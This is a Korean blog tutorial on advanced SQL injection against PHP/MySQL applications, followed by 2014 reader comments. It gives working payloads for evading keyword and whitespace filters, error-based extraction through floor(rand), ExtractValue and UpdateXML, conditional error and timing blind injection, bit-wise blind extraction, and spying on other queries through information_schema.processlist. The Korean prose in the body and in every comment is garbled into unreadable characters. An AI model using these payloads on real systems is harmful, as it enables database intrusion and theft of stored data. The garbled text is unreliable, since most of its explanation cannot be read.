SQL Injection for Expert
ۼ : rubiya

SQL Injection for Expert


*  ۼǾ°?
* SQL Injection Filter Bypass
* , Array SQL Injection
* Error Based SQL Injection
* Error Based Blind SQL Injection
* Indirect SQL Injection
* Efficient Blind SQL Injection
* SQL Injection with information schema.processlist

[*]  ۼǾ°?

LeaveRet Ҽ rubiya ȭ SQL injection ⸦ ϴ Ŀ, ڵ ؼ ۼߴ.

PHP, Mysql ȯ濡 SQL Injection ݿ ˷ Ŀ ؼ ٷ̴.

rubiya805[at]gmail.com ׿ ִ.

[*] SQL Injection Filter Bypass

κ ڵ SQL Injection κ ڽ Ʈ ȣϱ ̱͸ µ ٺ  õѴ.
׷ Ű带 ͸Ұ찡 ϴµ, ̴ κ ¼ҽ ߰ų ȭ ġ ̴.
̷ 쿡  ͸ ȸؾ ϴ ؼ ϰڴ.

鹮ڸ ͸ 쿡 %09, %0a, %0b, %0c, %0d, %a0, /**/ ؼ 鹮ڸ ü ִ.

̷ Ű 쿡 () ִ.

select * from table select(*)from(table) ̶ ϴٴ ̴.

#, -- ּ ͸ Ǿ 쿡 ;%00, /* Ҽ ִ. (Nullڴ magic_quotes_gpc )

̱Ͱ ڿ 0x, 0b ؼ 2, 16 ġȯν ȯ濡 x, b ص ȴ.

select x'61' = 'a'

Ʒó 0x, 0b 36 ص ȴ.

select conv(10,10,36)='A'

Ʒó ϴ ִ.

select substr(monthname(from_unixtime(1)),2,1)='a' // monthname(from_unixtime(1)) = 'January'

ڸ 쿡 auto type cast ؼ ȸѴ.

false = 0
true = 1
true+true = 2
floor(version()) = 5

Ϲ SQL Injection Ұ 쿡 Blind SQL Injection ؾ Ѵ.

Blind SQL Injection ϱ ؼ ڸ ߶󳻴 Ǿ ϴµ ⼭ substr Լ ͸ 찡 ִ.

޸ ͸ 쿡 select substr('asdf' from 1 for 1)='a' Ѵ.

Լ ü ͸ 쿡 substring Լ üҼ ִ.

׷ substring Լ substr ڿ ⿡ [substr(] ܾ ͸ ʴ̻ substr Լ Բ ͸ Ȯ .

׷ like ϵī带 ؼ Ʒó ȸ ִ.

select id from member where id like 'a%'
select id from member where id like 'b%'
select id from member where id like 'c%'

% ڿ ڰ ʰ select ִ ϴ ϵī̱⿡ ̷ ̴.

ù° ڸ ˾Ƴ Ŀ Ʒ ó ڿ ѱھ ָ߰ ȴ.

select id from member where id like 'ca%'
select id from member where id like 'cb%'
select id from member where id like 'cc%'

ϵī带 Ҷ cat, camel, camera ó Ͱ ÿ select 찡 ͽ÷ ۼҶ ؾ Ѵ.

like ͸ ߴٸ left Լ right Լ  ν ȸ ϴ.

Լ 1° ڷ , κ 2° ڷ ŭ ߶󳻴 Լ̴.

̸ ȥؼ Ʒ ó substr Լ ִ ̴.

select right(left('asd',1),1) = 'a'
select right(left('asd',2),1) = 's'
select right(left('asd',3),1) = 'd'

͸ ɷ Ʒ .

select mid('asd',1,1) = 'a'
select lpad('asd',1,space(1)) = 'a'
select rpad('asd',1,space(1)) = 'a'
select reverse(right(reverse('asd'),1)) = 'a'
select insert(insert('asd',1,0,space(0)),2,222,space(0)) = 'a'

concat Լ select 'a' 's' 'd' 'f'='asdf' ̷ ִ.

if Լ case(), ifnull(), nullif() ִ.

ex) select case when 1=1 then sleep(1) else 1 end

sleep Լ 쿡 benchmark() Լ ؼ select benchmark(1000000,MD5(CHAR(118))) ̷ ݺ ؼ ð ų ִ.

Ȥ select (select count(*) from information_schema.columns A, information_schema.columns B, information_schema.columns C) ̷ ð ɸ ν Ҽ ִ.

ٸ ϴµ ɸ ð ұĢ̶ ؾѴ.

[*] , Array SQL Injection

php.ini Ͽ magic_quotes_gpc = on صθ Ŭ̾Ʈ Ϳ ̱ տ 齽ø ٿش.

̴ SQL Injection ϴµ ū ɸ ǰ Ѵ.

׷ magic_quotes_gpc GET, POST, COOKIE ƿ ȴ.

magic_quotes_gpc ϰ , Array ͺ̽ Ժη ڴ 츮 հ̴.

̸׸ insert into uploadfile values('filename','path') 쿡 filename ſ


insert into uploadfile values('asdf','fdsa'),(version(),'1234'),('asdf','path') ̷ ۵ ִ ̴.

insert insert into table values('asdf',1),('fdsa',2),('zxc',3) ̷ ÿ ִٴ ٸ ȸ ˾Ƶ.

[*] Error Based SQL Injection

޼ ϴ SQL Injection ޼ ִ ȯ濡

ѹ ϴ ͸ ѹ ֱ α׵ Գ ϴµ ҿǴ ð Ǽ Blind SQL Injection ϰ .

SQLi mssql ȯ濡 ϴ.

ٸ ϰԵǸ ٰ ޼ ѹ վֱ ̴.


select * from table where 'asdf'=123

̶ 쿡

['asdf' int ϴ!]

޼ .

׷ mysql auto type cast ֱ ٸ ص ƹ .

ϴ ޼ ѹ ؼ

select sum(5),concat(version(),floor(rand(0)*2))as a from information_schema.tables group by a

̷ ؾѴ.

Ű带 ְ Ű ؼ ̴.

Ʒ  ̴.

select * from (select name_const(version(),1),name_const(version(),1))a

select * from table where 1=1 and ExtractValue(1,concat(0x01,version()))

select * from table where 1=1 and UpdateXML(1,concat(0x01,version()),1)

select * from table where (@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)

ȯ濡 ° .

[*] Error Based Blind SQL Injection

Ȳ 幮 ݱ ˾Ƶּ ܰ 丸 ˾Ƶ.

select * from table where 1 and if(1=1,1,(select 1 union select 2))

select * from table where 1 and if(1=2,1,(select 1 union select 2))

ù° if 1=1 Ǹ鼭 ܼ 1 ȯѴ.

ι° if Ǹ鼭 select 1 union select 2 ϰ ǰ,

ȯϸ鼭 ߻ϰ ȴ. (thx to hellsonic)

[*] Indirect SQL Injection

insert into member where values('guest','123','qwe') ִٰ غ.

[guest'] Էϸ php ܿ [guest\'] Ŀ mysql ν ġ ϵ ̴.

׷ mysql ȸϸ ( ݸ غ 翬ϰԵ) [guest'] ִ.

[guest'] α Ѵٸ ̵ [guest'] ȴ.

⼭ α׸ ٴ ϴ ൿ ̵ ִ ڵ尡 ִٸ?

̹ [guest'] ġ ȴ.

php.ini magic_quotes_runtime ɼ off ϶ ϴ. (thx to dmbs335@LeaveRet)

[*] Efficient Blind SQL Injection

Blind SQL Injection 쿡 ڸ ˾Ƴ 90ȸ Ѵ. (ƽŰ 32~127)

׷ ȿ ۼϸ ڴ 7ȸ ϴ.

ڸ 10 ȯְ ٽ 2 ȯ Ŀ lpad Լ 7ڷ ָ ȴ.

̷ε Ʒ .

select substr(lpad(bin(ascii(substr('asdf',1,1))),7,0),1,1)

˾Ƴϴ md5 hash 16 ̶ Ȯ ִٸ Ʒ ؼ ڴ 4ȸ ȿ̰ ϴ.

select substr(lpad(bin(if(ascii(substring(pw,1,1))<90,ascii(substring(pw,1,1))-48,ascii(substring(pw,1,1))-87)),4,0),1,1)

[*] SQL Injection with information schema.processlist

Ʈ SQL Injection Ҷ information schema.tables ̺ ̺  ̺ ϴ ִ ˱Ⱑ .

ᱹ ̸ ̺ ȫӿ شҼ ִ.

̷ information schema.processlist ̺ ؼ ϴ ִ ̺ ã ִ.

information schema.processlist ̺ صΰ ִ.

̷ select info from information_schema.processlist ؼ , غ ʾ ̽ ϵ ݺ õϸ ٸ ڰ ȸ Ұ̴.

ٸ ڰ α϶ 츮 ش ȸϴµ ߴٸ ȸ ִ Į ̺ ѹ ִ°̴.

[+] ħ

ο ϴ ſ ۰Գ Ǿ⸦ ٶ ģ.





4454 ޷ֽϴ.

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May 15, 2014 12:21

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May 15, 2014 02:09
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May 22, 2014 06:24

May 22, 2014 06:57
о ϰٽϴ!

Jun 24, 2014 10:52
ߴ ֳ׿ ... ϴ. ߾Կ ..

Jul 07, 2014 09:39
ϴ. ߹ о׿ մϴ. ^^

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Oct 01, 2014 04:03

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Oct 15, 2014 02:29
Array SQL Injection - magic_quotes_gpc ϰ , Array .. ̰Ŵ $_FILES ܾ ö󰡸鼭 ̻ϰ Array ܾ ȰŴ ּ

Oct 25, 2014 02:31
wow ϴ

Nov 04, 2014 12:39
rubiya,Ʋϰ ġ.

Nov 05, 2014 02:37
Ʋ ϴ ̰  ģǵ Ʋ..

Nov 05, 2014 11:13
lpadԼ ǹ " ִ " μ ׸ŭ ̰ ɶ äִ°ű. 7¥ 8ڷ 𸣰ڳ׿. reverse Լ ȿΰ? ׷ ʿ䵵 , lpad lpad ڿ ־ ̺ ڿ ̰ ۴ٸ ʿ䵵 ׳ ̸ŭ ȸϸ ɰű(׷ ʴٸ ̸ ƴϸ ڿ ִ üũ ϰ ϴ Ͱ׿) ذ ȵǰ ̳׿. 1n73ction Ź.

Nov 05, 2014 11:16
Ź -> Ź. lpad Լ ׳ ٽ ѹ . LPAD(ڿ, , ä ڿ) Դϴ. ù° ڷ  ڿ ̰ ι° ڿ ̿ ġ ° ڷ  ڿ ڿ պκп ݺ Ǹ鼭 ϴ. Ʋ ̴µ..

Nov 06, 2014 06:31
ȿ blind sql injection Դϴ. 0~128  翬 ؾ Ư Ȳ ؼ Ƚ ÷ ʿ並 ڳ׿. ׸ ̷ε庸 ξ ϰ ϴ ֽϴ. ϼ̴ " Ʋȴ" ǥ ߸ǽŵմϴ. Ư Ȳ ϰ Ѵٸ Լ ͸ϸ ȵ ׷ٰ ߸ ̷ε尡 ʽϴ. ̷ ڽ ̸ ɰ ø 뿡 å ø̴ϴ. Ѽձ Ͻð ϴ °  𸣰ڴµ л̸ ڽ ൿ å ̶ մϴ.  µ ϰ ǴϽñ ϴ.

Nov 07, 2014 04:24
; 8bit ƼƮ ڿΰ Ͱ ̹ ߳ .. κ hacker ʿ ϴ ڴ 32~ 127 ǥ ǰ ٸ ° ξ ̴µ.. 8bit Ű澵 ʿ䰡..? 1n73ction ڼ ʿ

to ppad123
Nov 07, 2014 09:07
ڼѵ о ʾҳ׿. " ASCII ڴ 7-bit ǥ ̸, ̷ ε PHP , MySQL ȯ濡 ε ̹Ƿ Ȯ ASCII 8-bit ƼƮ ڸ ؾ ϴ Դϴ."

Nov 18, 2014 02:43
MySQL ASCII Լ 0~255 Ѵٰ Ʈ , 0~255 ׷ ϱ ؾߵǰ. , ƼƮ ASCIIԼ ƴ ORDԼ ߵ˴ϴ. SUBSTRԼ ȸ ƿ ڿ ڵ尡 0~255 ƴ ֱ, ׷ 쿡 ƿ ASCIIԼ ߸ ϰ DZ. ƴϸ BLOB ȯ ASCIIԼ ؾմϴ.

Dec 01, 2014 05:30
... ׷ϱ ... ¿ Ű

Dec 12, 2014 03:21

Dec 28, 2014 05:57
帰 κ ٽ 캸 . 켱 MySQL ȯ濡 ascii Լ ܾ ǹ ״ 7-bit ascii ν , ascii ִ ԼԴϴ. ׷ ̷ε带 ascii Լ ڸ bin Լ ȭϰ ȯ lpad Լ ֻ 1Ʈ ġ 0 ä־ 7-bit ¸ ְ substring Ͽ 7ȸ ϴ ε, ̴ ߸ ̷ε尡 ƴ ̰ ( ߿ 100000~111111 ڸ ֻ 1Ʈ ڸ "0" е, äν 7-bit ascii ¸ ְ substring ϴ ) 32~127 Ͽ Ѵٰ ռ Ǿϱ. ׷ Ͽ κ ׷ ǹ̰ ƴϿ. ˴ٽ ascii Լ 7-bit ascii ν,ȯ մϴ. ٽ ٸ ޼ҵ忡 پ Ŀ, bin Լ lpad Լ Ͽ ֻ Ʈ еϿ ϴ ̿ܿ ȯ濡 ȿ ִ پ ̷ε忡 Ͽ ƹ Ұ Ǿ . ̰ 帰 κԴϴ (' ȿ̰ ִ  ȯ, Ǿ ִٸ " ٵ"..'). ̸׸ bin , lpad ȯ Binary Large OBject ȯ üϿ ascii Լ 8-bit ƼƮ ̻ Ϻ ڵ ν, ǵ MySQL ȯ濡 ȿ , utf-8 ȯ濡 ̷ε 񱳿ڸ ȯ濡 ȭ, ȯϿ ϴ Binary Searching . ܿ Ÿ ̵ ܿ ascii Լ (Ű) ü ͸ ϴ Ȳ 忡־ ȯ, ü Ű忡 Ǿִٸ 鿡 ְ. ׸ ˴ٽ substr Լ ϴ ڿ ν ŭ ( 8-bit ƼƮ ̻ Ϻ ڵ ) ִ ord ڿ Լ Ͽ üҼ ְ ( ռ κ ). ̸ϸ ϽǰŶ Ͻϴ. ̴ ǵ ʴ ȭ ̳ Ͻ ΰ? " µ ϰ ǴϽñ ϴ."

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